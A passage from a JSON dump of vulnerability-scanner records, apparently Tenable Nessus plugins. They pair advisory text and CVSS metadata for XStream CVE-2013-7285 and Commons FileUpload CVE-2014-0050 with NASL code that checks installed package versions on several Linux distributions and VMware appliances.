\nImpact :\n\n A remote attacker could pass a specially crafted XML document to\n XStream, possibly resulting in the execution of arbitrary code with the\n privileges of the process or a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 23, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-13T00:00:00", "title": "GLSA-201612-35 : XStream: Remote execution of arbitrary code", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-7285"], "modified": "2016-12-13T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:xstream"], "id": "GENTOO_GLSA-201612-35.NASL", "href": "https://www.tenable.com/plugins/nessus/95738", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201612-35.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95738);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-7285\");\n script_xref(name:\"GLSA\", value:\"201612-35\");\n\n script_name(english:\"GLSA-201612-35 : XStream: Remote execution of arbitrary code\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201612-35\n(XStream: Remote execution of arbitrary code)\n\n It was found that XStream would deserialize arbitrary user-supplied XML\n content, thus representing objects of any type.\n \nImpact :\n\n A remote attacker could pass a specially crafted XML document to\n XStream, possibly resulting in the execution of arbitrary code with the\n privileges of the process or a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201612-35\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All XStream users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-java/xstream-1.4.8-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:xstream\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-java/xstream\", unaffected:make_list(\"ge 1.4.8-r1\"), vulnerable:make_list(\"lt 1.4.8-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"XStream\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T13:14:14", "description": "An updated jasperreports-server-pro package that fixes one security\nissue is now available.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe Red Hat Enterprise Virtualization reports package provides a suite\nof pre-configured reports and dashboards that enable you to monitor\nthe system. The reports module is based on JasperReports and\nJasperServer, and can also be used to create ad-hoc reports.\n\nXStream is a simple library used by the Red Hat Enterprise\nVirtualization reports package to serialize and de-serialize objects\nto and from XML.\n\nIt was found that XStream could deserialize arbitrary user-supplied\nXML content, representing objects of any type. A remote attacker able\nto pass XML to XStream could use this flaw to perform a variety of\nattacks, including remote code execution in the context of the server\nrunning the XStream application. (CVE-2013-7285)\n\nAll jasperreports-server-pro users are advised to upgrade to this\nupdated package, which contains a backported patch to correct this\nissue.", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-11-08T00:00:00", "title": "RHEL 6 : jasperreports-server-pro (RHSA-2014:0389)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-7285"], "modified": "2014-11-08T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:jasperreports-server-pro", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2014-0389.NASL", "href": "https://www.tenable.com/plugins/nessus/79007", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0389. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79007);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-7285\");\n script_xref(name:\"RHSA\", value:\"2014:0389\");\n\n script_name(english:\"RHEL 6 : jasperreports-server-pro (RHSA-2014:0389)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated jasperreports-server-pro package that fixes one security\nissue is now available.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe Red Hat Enterprise Virtualization reports package provides a suite\nof pre-configured reports and dashboards that enable you to monitor\nthe system. The reports module is based on JasperReports and\nJasperServer, and can also be used to create ad-hoc reports.\n\nXStream is a simple library used by the Red Hat Enterprise\nVirtualization reports package to serialize and de-serialize objects\nto and from XML.\n\nIt was found that XStream could deserialize arbitrary user-supplied\nXML content, representing objects of any type. A remote attacker able\nto pass XML to XStream could use this flaw to perform a variety of\nattacks, including remote code execution in the context of the server\nrunning the XStream application. (CVE-2013-7285)\n\nAll jasperreports-server-pro users are advised to upgrade to this\nupdated package, which contains a backported patch to correct this\nissue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:0389\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-7285\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jasperreports-server-pro package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jasperreports-server-pro\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0389\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"jasperreports-server-pro-5.5.0-6.el6ev\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jasperreports-server-pro\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T14:38:44", "description": "This update fixes a security issue with jakarta-commons-fileupload :\n\n - denial of service due to too-small buffer size used\n (CVE-2014-0050). (bnc#862781)", "edition": 17, "published": "2014-04-18T00:00:00", "title": "SuSE 11.3 Security Update : jakarta-commons-fileupload (SAT Patch Number 9087)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2014-04-18T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:jakarta-commons-fileupload", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:jakarta-commons-fileupload-javadoc"], "id": "SUSE_11_JAKARTA-COMMONS-FILEUPLOAD-140403.NASL", "href": "https://www.tenable.com/plugins/nessus/73609", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73609);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0050\");\n\n script_name(english:\"SuSE 11.3 Security Update : jakarta-commons-fileupload (SAT Patch Number 9087)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a security issue with jakarta-commons-fileupload :\n\n - denial of service due to too-small buffer size used\n (CVE-2014-0050). (bnc#862781)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=862781\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0050.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 9087.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:jakarta-commons-fileupload\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:jakarta-commons-fileupload-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"jakarta-commons-fileupload-1.1.1-1.37.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"jakarta-commons-fileupload-javadoc-1.1.1-1.37.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-03-01T07:49:02", "description": "The version of VMware vCenter Orchestrator Appliance installed on the\nremote host is 5.5.x prior to 5.5.2. It is, therefore, affected by a\ndenial of service vulnerability due to an error that exists in the\nincluded Apache Tomcat version related to handling 'Content-Type' HTTP\nheaders and multipart requests.", "edition": 28, "published": "2014-10-24T00:00:00", "title": "VMware vCenter Orchestrator Appliance 5.5.x < 5.5.2 DoS (VMSA-2014-0007)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_orchestrator"], "id": "VMWARE_ORCHESTRATOR_APPLIANCE_VMSA_2014_0007.NASL", "href": "https://www.tenable.com/plugins/nessus/78670", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78670);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"VMSA\", value:\"2014-0007\");\n\n script_name(english:\"VMware vCenter Orchestrator Appliance 5.5.x < 5.5.2 DoS (VMSA-2014-0007)\");\n script_summary(english:\"Checks the version of VMware vCenter Orchestrator Appliance.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization appliance installed that is\naffected by a denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Orchestrator Appliance installed on the\nremote host is 5.5.x prior to 5.5.2. It is, therefore, affected by a\ndenial of service vulnerability due to an error that exists in the\nincluded Apache Tomcat version related to handling 'Content-Type' HTTP\nheaders and multipart requests.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0007.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCenter Orchestrator 5.5.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0050\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_orchestrator\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/VMware vCenter Orchestrator/Version\", \"Host/VMware vCenter Orchestrator/VerUI\", \"Host/VMware vCenter Orchestrator/Build\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"Host/VMware vCenter Orchestrator/Version\");\nverui = get_kb_item_or_exit(\"Host/VMware vCenter Orchestrator/VerUI\");\n\nif (version =~ '^5\\\\.5\\\\.')\n{\n build = get_kb_item_or_exit(\"Host/VMware vCenter Orchestrator/Build\");\n if (int(build) < 1992027)\n {\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + verui +\n '\\n Fixed version : 5.5.2 Build 1992027' + \n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n }\n}\n\naudit(AUDIT_INST_VER_NOT_VULN, 'VMware vCenter Orchestrator Appliance', verui);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:54:34", "description": "Updated apache-commons-fileupload packages fix security \nvulnerability :\n\nIt was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition\n(CVE-2014-0050).\n\nTomcat 7 includes an embedded copy of the Apache Commons FileUpload\npackage, and was affected as well.\n\nAdditionally a build problem with maven was discovered, fixed maven\npackages is also being provided with this advisory.", "edition": 24, "published": "2014-03-14T00:00:00", "title": "Mandriva Linux Security Advisory : apache-commons-fileupload (MDVSA-2014:056)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2014-03-14T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:tomcat-admin-webapps", "cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:tomcat-docs-webapp", "p-cpe:/a:mandriva:linux:tomcat-servlet-3.0-api", "p-cpe:/a:mandriva:linux:tomcat-javadoc", "p-cpe:/a:mandriva:linux:tomcat-el-2.2-api", "p-cpe:/a:mandriva:linux:apache-commons-fileupload", "p-cpe:/a:mandriva:linux:tomcat-lib", "p-cpe:/a:mandriva:linux:tomcat", "p-cpe:/a:mandriva:linux:maven", "p-cpe:/a:mandriva:linux:tomcat-webapps", "p-cpe:/a:mandriva:linux:tomcat-jsvc", "p-cpe:/a:mandriva:linux:tomcat-jsp-2.2-api", "p-cpe:/a:mandriva:linux:apache-commons-fileupload-javadoc", "p-cpe:/a:mandriva:linux:maven-javadoc"], "id": "MANDRIVA_MDVSA-2014-056.NASL", "href": "https://www.tenable.com/plugins/nessus/73003", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:056. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73003);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"MDVSA\", value:\"2014:056\");\n\n script_name(english:\"Mandriva Linux Security Advisory : apache-commons-fileupload (MDVSA-2014:056)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated apache-commons-fileupload packages fix security \nvulnerability :\n\nIt was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition\n(CVE-2014-0050).\n\nTomcat 7 includes an embedded copy of the Apache Commons FileUpload\npackage, and was affected as well.\n\nAdditionally a build problem with maven was discovered, fixed maven\npackages is also being provided with this advisory.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0109.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0110.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-commons-fileupload\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-commons-fileupload-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:maven\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:maven-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"apache-commons-fileupload-1.2.2-7.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"apache-commons-fileupload-javadoc-1.2.2-7.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"maven-3.0.4-29.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"maven-javadoc-3.0.4-29.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-admin-webapps-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-docs-webapp-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-el-2.2-api-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-javadoc-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-jsp-2.2-api-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-jsvc-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-lib-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-servlet-3.0-api-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-webapps-7.0.41-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-09-14T19:09:30", "description": "According to its self-reported version number, the instance of Apache\nTomcat 7.0.x listening on the remote host is prior to 7.0.52. It is,\ntherefore, affected by an error related to handling 'Content-Type'\nHTTP headers and multipart requests such as file uploads.\n\nNote that this error exists because of the bundled version of Apache\nCommons FileUpload.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 18, 